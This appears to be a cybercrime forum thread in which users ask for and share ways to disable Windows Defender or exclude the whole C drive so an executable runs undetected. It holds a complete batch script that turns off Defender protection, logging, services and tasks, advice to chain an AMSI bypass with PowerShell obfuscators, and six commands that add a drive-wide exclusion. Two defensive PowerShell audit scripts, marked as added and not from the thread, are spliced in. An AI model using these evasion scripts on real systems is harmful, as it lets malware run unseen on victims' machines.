Runion

Batch Script for Windows Defender Exclusion - Looking for it

xcrew1990
I'm looking for a batch script that can bypass defender and Exclude the whole "C" partition from it permanently. Need to run exe undetected.
Seems the usual powershell.exe -command "Add-MpPreference -ExclusionExtension exe" is being detected nowadays.
Last edited: 20.02.2024
 
Code:
rem USE AT OWN RISK AS IS WITHOUT WARRANTY OF ANY KIND !!!!!
rem https://technet.microsoft.com/en-us/itpro/powershell/windows/defender/set-mppreference
rem To also disable Windows Defender Security Center include this
rem reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
rem 1 - Disable Real-time protection
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
rem 0 - Disable Logging
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
rem Disable WD Tasks
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
rem Disable WD systray icon
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
rem Remove WD context menu
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
rem Disable WD services
rem For these to execute successfully, you may need to boot into safe mode due to tamper protect
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
rem added the following on 07/25/19 for win10v1903
reg add "HKLM\System\CurrentControlSet\Services\Sense" /v "Start" /t REG_DWORD /d "4" /f
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
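The batch script above touches four kinds of state: Defender policy values, service start types, ETW autologgers and scheduled tasks. The following read-only audit is an added example, not code from the thread or its author: it checks exactly those locations (only the key, service and task names that appear in the script) and cross-checks them against what the engine itself reports via Get-MpComputerStatus. Run it from an elevated PowerShell; the IsTamperProtected property is only present on builds that ship tamper protection, so the script tests for it before reading it.

```powershell
# Added audit example (not from the thread): reports whether the Defender policy keys,
# services, scheduled tasks and ETW autologgers referenced in the batch script above
# are still in their default state. Read-only; run from an elevated PowerShell.

$findings = [System.Collections.Generic.List[string]]::new()

# 1. Policy values the script writes. A missing key or value means "not set", i.e. default.
$policyChecks = @(
    @{ Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender';                      Name = 'DisableAntiSpyware';        Bad = 1 },
    @{ Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender';                      Name = 'DisableAntiVirus';          Bad = 1 },
    @{ Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection'; Name = 'DisableRealtimeMonitoring'; Bad = 1 },
    @{ Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection'; Name = 'DisableBehaviorMonitoring'; Bad = 1 },
    @{ Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection'; Name = 'DisableIOAVProtection';     Bad = 1 },
    @{ Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection'; Name = 'DisableOnAccessProtection'; Bad = 1 },
    @{ Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet';               Name = 'DisableBlockAtFirstSeen';   Bad = 1 },
    @{ Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet';               Name = 'SpynetReporting';           Bad = 0 }
)
foreach ($c in $policyChecks) {
    $v = (Get-ItemProperty -Path $c.Path -Name $c.Name -ErrorAction SilentlyContinue).($c.Name)
    if ($null -ne $v -and $v -eq $c.Bad) {
        $findings.Add("policy     $($c.Path)\$($c.Name) = $v (protection disabled by policy)")
    }
}

# 2. Service start types. Start=4 means Disabled, which is what the script writes.
foreach ($svc in 'WinDefend','WdFilter','WdBoot','WdNisDrv','WdNisSvc','SecurityHealthService','Sense') {
    $key   = "HKLM:\SYSTEM\CurrentControlSet\Services\$svc"
    $start = (Get-ItemProperty -Path $key -Name Start -ErrorAction SilentlyContinue).Start
    if ($start -eq 4) { $findings.Add("service    $svc Start=4 (disabled)") }
}

# 3. Defender ETW autologgers. Start=0 switches the trace sessions off at boot.
foreach ($lg in 'DefenderApiLogger','DefenderAuditLogger') {
    $key   = "HKLM:\SYSTEM\CurrentControlSet\Control\WMI\Autologger\$lg"
    $start = (Get-ItemProperty -Path $key -Name Start -ErrorAction SilentlyContinue).Start
    if ($start -eq 0) { $findings.Add("autologger $lg Start=0 (logging disabled)") }
}

# 4. Scheduled maintenance and scan tasks under \Microsoft\Windows\Windows Defender\.
$taskNames = 'Windows Defender Cache Maintenance','Windows Defender Cleanup',
             'Windows Defender Scheduled Scan','Windows Defender Verification'
foreach ($t in Get-ScheduledTask -TaskPath '\Microsoft\Windows\Windows Defender\' -ErrorAction SilentlyContinue) {
    if ($taskNames -contains $t.TaskName -and $t.State -eq 'Disabled') {
        $findings.Add("task       $($t.TaskName) is Disabled")
    }
}

# 5. Cross-check against the engine's own view of its state.
$status = Get-MpComputerStatus -ErrorAction SilentlyContinue
if ($status) {
    foreach ($p in 'AntivirusEnabled','RealTimeProtectionEnabled','BehaviorMonitorEnabled',
                   'IoavProtectionEnabled','OnAccessProtectionEnabled') {
        if (-not $status.$p) { $findings.Add("status     $p = False") }
    }
    # IsTamperProtected only exists on builds that ship tamper protection.
    if ($status.PSObject.Properties['IsTamperProtected'] -and -not $status.IsTamperProtected) {
        $findings.Add("status     IsTamperProtected = False (settings changeable by any local admin)")
    }
}

if ($findings.Count -eq 0) { 'No Defender tampering indicators found.' } else { $findings }
```

Every finding is a location the script above modifies, so a non-empty result on a machine that should have Defender enabled is a direct indicator that this script, or something equivalent, has been run. Section 5 matters because policy keys can be present while the engine still runs (for example where tamper protection ignored them): compare both views rather than trusting the registry alone.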
 
KernelMode said:
Code:
rem USE AT OWN RISK AS IS WITHOUT WARRANTY OF ANY KIND !!!!!
rem https://technet.microsoft.com/en-us/itpro/powershell/windows/defender/set-mppreference
rem To also disable Windows Defender Security Center include this
rem reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
rem 1 - Disable Real-time protection
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
rem 0 - Disable Logging
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
rem Disable WD Tasks
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
rem Disable WD systray icon
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
rem Remove WD context menu
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
rem Disable WD services
rem For these to execute successfully, you may need to boot into safe mode due to tamper protect
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
rem added the following on 07/25/19 for win10v1903
reg add "HKLM\System\CurrentControlSet\Services\Sense" /v "Start" /t REG_DWORD /d "4" /f
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f

Can I PM you? You seem very knowledgeable in coding, especially encrypting, and I need to get some answers or a small guide.
 
Code an AMSI bypass in .NET then do CLR Invoke from powershell with .NET bytecode. Use Chimera on the powershell CLR Invoke script + a simple custom powershell crypter or use betterxencrypt.ps1 then Chimera again.

And you can sneak in any powershell code on it afterwards. Including the Add-MpPreference exclusion.
 
xmarina said:
Code an AMSI bypass in .NET then do CLR Invoke from powershell with .NET bytecode. Use Chimera on the powershell CLR Invoke script + a simple custom powershell crypter or use betterxencrypt.ps1 then Chimera again.

And you can sneak in any powershell code on it afterwards. Including the Add-MpPreference exclusion.

I am not experienced, mind showing me on Telegram for a fee? Please send me a PM.
 
xcrew1990 said:
I'm looking for a batch script that can bypass defender and Exclude the whole "C" partition from it permanently. Need to run exe undetected.
Seems the usual powershell.exe -command "Add-MpPreference -ExclusionExtension exe" is being detected nowadays.

I was about to type what you just said. But I want a loader that would do that and then, after a few minutes, exec another exe.
 
This will only work on older versions of windows anything below windows 10 any build after that has tamper protection enabled by default that makes this not possible. Tamper protection blocks reg edit or the use of MpPreference/all command line options to change defender settings. Powershell still works fine on any system without tamper protection. No need for a .bat file that's easier to detect vs a command.
Last edited: Today at 03:40
 
ZeroCorp said:
This will only work on older versions of windows anything below windows 10 any build after that has tamper protection enabled by default that makes this not possible. Tamper protection blocks reg edit or the use of MpPreference/all command line options to change defender settings. Powershell still works fine on any system without tamper protection. No need for a .bat file that's easier to detect vs a command.

So how to bypass defender permanently?
 
ZeroCorp said:
This will only work on older versions of windows anything below windows 10 any build after that has tamper protection enabled by default that makes this not possible. Tamper protection blocks reg edit or the use of MpPreference/all command line options to change defender settings. Powershell still works fine on any system without tamper protection. No need for a .bat file that's easier to detect vs a command.

Editing the registry, or adding an exclusion via powershell, works on all versions, at least on the server versions, and on Windows 10 it works with admin rights.

And there is no point in disabling Defender at all, it's too conspicuous; it's better to just add the whole drive to the exclusions and that's it.
 
Dark_TM said:
Editing the registry, or adding an exclusion via powershell, works on all versions, at least on the server versions, and on Windows 10 it works with admin rights.

And there is no point in disabling Defender at all, it's too conspicuous; it's better to just add the whole drive to the exclusions and that's it.

Adding entire disk using Add-MpPreference is being blocked by latest defender. Any other way?
 
Code:
1)
Add-MpPreference -ExclusionPath "C:\"
2)
Set-MpPreference -ExclusionPath "C:\"
3)
New-Item -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" -Name "C_Drive" -Value "C:\" -Force
4)
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" -Name "C_Drive" -Value "C:\" -PropertyType String -Force
5)
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" -Name "C_Drive" -Value "C:\"
6)
powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\'"
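The six variants above all aim at the same end state: a drive-root exclusion, held either in Defender's preference store or under HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths. From the defender's side the question is how to notice it. The script below is an added example, not code from the thread: it enumerates exclusions through Get-MpPreference and through that registry key, flags over-broad entries (a drive root, or an extension such as "exe"), and pulls Defender's own event ID 5007, which is written to the Microsoft-Windows-Windows Defender/Operational log whenever a setting changes, including exclusion additions. The list of "broad" extensions and the seven-day window are my choices, not anything the thread states. Run it elevated; recent builds hide exclusion lists from non-administrators.

```powershell
# Added audit example (not from the thread): lists Defender exclusions, flags
# over-broad ones, and shows recent configuration-change events (ID 5007) so that
# the addition of an exclusion can be tied to a time and an account. Read-only.

function Test-BroadExclusion {
    param([string]$Path)
    # Drive root ("C:" or "C:\"), a bare backslash, or a wildcard-only pattern.
    return ($Path -match '^[A-Za-z]:\\?$') -or ($Path -match '^\\$') -or ($Path -match '^\*+$')
}

# Extensions chosen for this example; any executable or script type counts as broad.
$broadExtensions = 'exe','dll','ps1','bat','cmd','js','vbs','scr'

$report = [System.Collections.Generic.List[string]]::new()
$pref   = Get-MpPreference

foreach ($p in @($pref.ExclusionPath)) {
    # Non-admins receive an "N/A: ..." placeholder instead of the list; skip it.
    if ([string]::IsNullOrEmpty($p) -or $p.StartsWith('N/A')) { continue }
    $flag = if (Test-BroadExclusion $p) { 'BROAD ' } else { '      ' }
    $report.Add("$flag path      $p")
}
foreach ($e in @($pref.ExclusionExtension)) {
    if ([string]::IsNullOrEmpty($e) -or $e.StartsWith('N/A')) { continue }
    $flag = if ($e.TrimStart('.') -in $broadExtensions) { 'BROAD ' } else { '      ' }
    $report.Add("$flag extension $e")
}
foreach ($x in @($pref.ExclusionProcess)) {
    if ([string]::IsNullOrEmpty($x) -or $x.StartsWith('N/A')) { continue }
    $report.Add("       process   $x")
}

# Registry view referenced in the thread. The engine stores each excluded path as a
# value *name* under Paths; the examples above write the path as value *data* under
# the name C_Drive, so both the name and the data are checked here.
$regPaths = 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths'
$item = Get-Item -Path $regPaths -ErrorAction SilentlyContinue   # may be access-denied on newer builds
if ($item) {
    foreach ($n in $item.GetValueNames()) {
        $d = [string]$item.GetValue($n)
        if ((Test-BroadExclusion $n) -or (Test-BroadExclusion $d)) {
            $report.Add("BROAD  registry  $n = $d")
        }
    }
}

# Event 5007 records every Defender configuration change with old and new values, so a
# newly added exclusion shows up here with a timestamp even if it is later removed.
$events = Get-WinEvent -FilterHashtable @{
    LogName   = 'Microsoft-Windows-Windows Defender/Operational'
    Id        = 5007
    StartTime = (Get-Date).AddDays(-7)
} -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'Exclusions' } |
    Select-Object TimeCreated, Message

'--- current exclusions ---'
if ($report.Count -eq 0) { '(none visible)' } else { $report }
'--- configuration changes touching exclusions, last 7 days ---'
if ($events) { $events | Format-List } else { '(none)' }
```

Forwarding event 5007 to a central log collector is the durable version of this check: the cmdlets above only show the exclusion while it exists, whereas the event survives a later Remove-MpPreference. Pairing the 5007 time with PowerShell script-block logging (event 4104) or process-creation auditing on the same host identifies which command and account added the entry.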
 
Dark_TM said:
Code:
1)
Add-MpPreference -ExclusionPath "C:\"
2)
Set-MpPreference -ExclusionPath "C:\"
3)
New-Item -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" -Name "C_Drive" -Value "C:\" -Force
4)
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" -Name "C_Drive" -Value "C:\" -PropertyType String -Force
5)
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" -Name "C_Drive" -Value "C:\"
6)
powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\'"

If the account has admin rights, the drive will be added to the exclusions.
 